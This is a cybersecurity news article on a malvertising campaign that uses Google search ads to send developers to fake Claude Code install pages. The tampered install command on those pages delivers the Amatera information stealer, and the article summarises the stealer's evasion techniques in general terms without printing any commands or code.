The Vibe-Coding Trap: Fake Claude Code Installers Unleash Amatera Malware via Search Ads
Ddos 
The fake install pages are distributed exclusively through Google Ads
In the fast-paced world of AI development, “vibe-coding” has become a popular term for rapid, experimental building. However, a new campaign identified by Push researchers proves that even the trendiest tools aren’t safe from old-school tactics. Attackers are currently targeting Anthropic’s Claude Code, one of the fastest-growing developer tools, using a sophisticated “InstallFix” malvertising scheme.
Claude Code is a command-line AI assistant that has quickly become a staple for everyone from senior engineers to amateur builders. The researchers note: “All you need to make this attack work is a popular tool you can impersonate. Naturally, this makes trendy AI tools a popular choice.”
The campaign relies on malvertising—boosting a malicious lure through sponsored search engine results to intercept users looking for the official installation page.
The execution is straightforward but highly effective:
- Attackers created a “near-pixel-perfect replica” of the real Claude Code installation page, complete with the official branding, layout, and documentation sidebar.
- Like many CLI tools, Claude Code is typically installed via a terminal command that pipes a remote script into a shell. The attackers updated these instructions with a single, critical change: “instead of fetching the install script from claude.ai, the commands point to an attacker-controlled server that serves malware instead”.
- To blend in with legitimate traffic, the campaign abuses trusted hosting services like Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne.
The ultimate goal of the “InstallFix” campaign is the deployment of Amatera, a potent information stealer. Amatera is an evolution of the older ACR Stealer and is currently sold via subscription to various criminal operators.
Once it hits a system, Amatera is designed to be a “ghost in the machine”. It uses several advanced techniques to bypass security software (AV/EDR), including:
- Direct NTSockets for communicating with its Command and Control (C2) server.
- Dynamic API resolution and WoW64 Syscalls to hide its activity from monitoring tools.
- CDN Masking: The malware communicates using hardcoded IP addresses belonging to legitimate CDNs, making the traffic “difficult to block without disrupting legitimate services”.
This campaign highlights a growing trend of attackers impersonating popular tools to deliver malware via sponsored search results. Developers shoud double-check the URL before running any installation “one-liner” in your terminal.
The researchers discovered that “different sites were executing identical binaries,” confirming that this is a wide-reaching, coordinated campaign. As AI tools continue to grow in popularity, so will the efforts of threat actors to capitalize on their “vibe.”
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
